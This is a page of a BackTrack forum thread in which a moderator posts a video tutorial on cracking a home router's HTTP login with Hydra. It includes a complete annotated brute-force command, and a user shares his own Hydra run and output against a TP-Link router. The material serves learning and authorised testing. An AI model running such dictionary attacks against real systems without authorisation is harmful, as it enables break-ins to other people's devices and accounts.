Page 1 of 3 123 LastLast
Results 1 to 10 of 29

Thread: [Video] How to: Crack HTTP passwords (hydra)

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Lightbulb [Video] Cracking HTTP Passwords (Hydra)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/2318952
    Download video: http://www.mediafire.com/?yhc1adzytiqibjc


    What is this?
    A basic guide on how to use hydra to crack a http password on a 'home' router.


    How does this work?
    > Uses a dictionary attack to test for weak or simple passwords on one or more remote clients


    What do I need?
    > Hydra
    > (Big) dictionary


    Software
    Name: Hydra
    Version: 5.4
    Home Page: http://freeworld.thc.org/welcome/
    Download Link: http://freeworld.thc.org/download.ph...5.4-src.tar.gz


    Commands:
    Code:
    hydra -l admin -P /pentest/passwords/wordlists/g0tmi1k.lst -e ns -t 15 -f -s -vV 192.168.1.1 http-get /
    
    -l = username
    -P = password (Looks for a wordlist)
    -e ns = checks for 'null' password
    -t xx= How many tasks to run at once
    -f = exit once it finds the first user/password
    -s = connect via SSL
    -vV = verbose mode (shows more info)
    192.168.1.1 = IP address
    http-get = what to crack/method etc
    / = Page to crack - root
    Notes:
    This is cut from my final video called "g0tmi1k's home network".
    The password HAS to be in the dictionary - so if you use something like http://grc.com/pass, the chances of it being crack is next to nothing!

    Song: Rage Against The Machine - Killing in the Name of (Mr. Oizo Remix)
    Video length: 01:21
    Capture length: 01:40

    Blog Post:http://g0tmi1k.blogspot.com/2009/07/video-tutorial-how-to-crack-http-hydra.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1657-%5Bvideo%5D-how-crack-http-passwords-hydra.html
    Dictionaries: http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html
    Last edited by g0tmi1k; 03-05-2011 at 04:29 PM.
    Have you...g0tmi1k?

  2. #2
    Member m0j4h3d's Avatar
    Join Date
    Jan 2010
    Posts
    84

    Default Re: [Video] How to: Crack HTTP passwords (hydra)

    thank you for the post .. nice ,,go for more
    ---> 3v3RY D4y P4ss3S 1 f0uNd N3W th1NGs <---
    Knowing how 2 use BT dsnt mean that u r hacker

  3. #3
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] How to: Crack HTTP passwords (hydra)

    Thanks for the thanks.
    Have you...g0tmi1k?

  4. #4
    Just burned his ISO
    Join Date
    Jun 2010
    Posts
    7

    Question Re: [Video] How to: Crack HTTP passwords (hydra)

    I tried to crack my router with hydra, but I got an invalid pointer.
    I have searched for a solution, some of the said that it is a bug in hydra.
    So i googled it and found some patches but I was unable to succesfully use them.
    Do someone here has a solution?

  5. #5
    Just burned his ISO
    Join Date
    Nov 2009
    Posts
    1

    Default Re: [Video] How to: Crack HTTP passwords (hydra)

    thanks man

    This is the best

  6. #6
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] How to: Crack HTTP passwords (hydra)

    Quote Originally Posted by errorman View Post
    I tried to crack my router with hydra, but I got an invalid pointer.
    I have searched for a solution, some of the said that it is a bug in hydra.
    So i googled it and found some patches but I was unable to succesfully use them.
    Do someone here has a solution?
    Could you give some more information?
    What router are you using?
    What interface?
    Whats the error?
    What command are you using?

    Quote Originally Posted by Big_virus_55 View Post
    thanks man

    This is the best
    Thanks for the thanks! (=
    Have you...g0tmi1k?

  7. #7
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    1

    Default Re: [Video] How to: Crack HTTP passwords (hydra)

    thanks when I download bt4 I will have a try

    thanks again

  8. #8
    Just burned his ISO dareeek's Avatar
    Join Date
    Jan 2010
    Posts
    6

    Default Re: [Video] How to: Crack HTTP passwords (hydra)

    First of all, thanks for this how-to.

    Anyway, I didn't manage to run hydra successfully.
    I got TP-Link TL-WR543G router. User name is 'admin', and so is password.

    Here's the result of my try:
    Code:
    root@bt:~# hydra -l admin -P /root/dict -t 10 10.1.1.1 http-get /
    Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
    Hydra (http://www.thc.org) starting at 2010-08-14 15:45:12
    [DATA] 5 tasks, 1 servers, 5 login tries (l:1/p:5), ~1 tries per task
    [DATA] attacking service http-get on port 80
    [STATUS] attack finished for 10.1.1.1 (waiting for childs to finish)
    Unusual return code:  for admin:pwd2
    Unusual return code:  for admin:pwd1
    Unusual return code:  for admin:admin
    Unusual return code:  for admin:pwd4
    Unusual return code:  for admin:pwd3
    Hydra (http://www.thc.org) finished at 2010-08-14 15:45:13
    root@bt:~#

  9. #9
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] How to: Crack HTTP passwords (hydra)

    Quote Originally Posted by dareeek View Post
    First of all, thanks for this how-to.

    Anyway, I didn't manage to run hydra successfully.
    I got TP-Link TL-WR543G router. User name is 'admin', and so is password.

    Here's the result of my try:
    Code:
    root@bt:~# hydra -l admin -P /root/dict -t 10 10.1.1.1 http-get /
    Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
    Hydra (http://www.thc.org) starting at 2010-08-14 15:45:12
    [DATA] 5 tasks, 1 servers, 5 login tries (l:1/p:5), ~1 tries per task
    [DATA] attacking service http-get on port 80
    [STATUS] attack finished for 10.1.1.1 (waiting for childs to finish)
    Unusual return code:  for admin:pwd2
    Unusual return code:  for admin:pwd1
    Unusual return code:  for admin:admin
    Unusual return code:  for admin:pwd4
    Unusual return code:  for admin:pwd3
    Hydra (http://www.thc.org) finished at 2010-08-14 15:45:13
    root@bt:~#
    Not all routers are vulnerable to it.
    I think its because how it handles the authentication (basic.auth?).
    and as I haven't got a TP-Link at the mo, I can't try. Is the index page protected?
    Have you...g0tmi1k?

  10. #10
    Just burned his ISO dareeek's Avatar
    Join Date
    Jan 2010
    Posts
    6

    Default Re: [Video] How to: Crack HTTP passwords (hydra)

    What do you mean by 'basic.auth'? User is authenticated by a password.
    Index page isn't protected in any way. Connection goes through http. SSL is not used.

Page 1 of 3 123 LastLast

Similar Threads

  1. [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)
    By g0tmi1k in forum BackTrack Videos
    Replies: 50
    Last Post: 04-08-2011, 07:35 AM
  2. Hydra error
    By Valen in forum Beginners Forum
    Replies: 3
    Last Post: 07-09-2010, 03:11 AM
  3. Some trouble with medusa/hydra
    By necroth85 in forum Beginners Forum
    Replies: 0
    Last Post: 02-03-2010, 05:39 AM
  4. http-post-forms =how u do it????
    By blue_bsm in forum Beginners Forum
    Replies: 3
    Last Post: 01-16-2010, 05:25 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •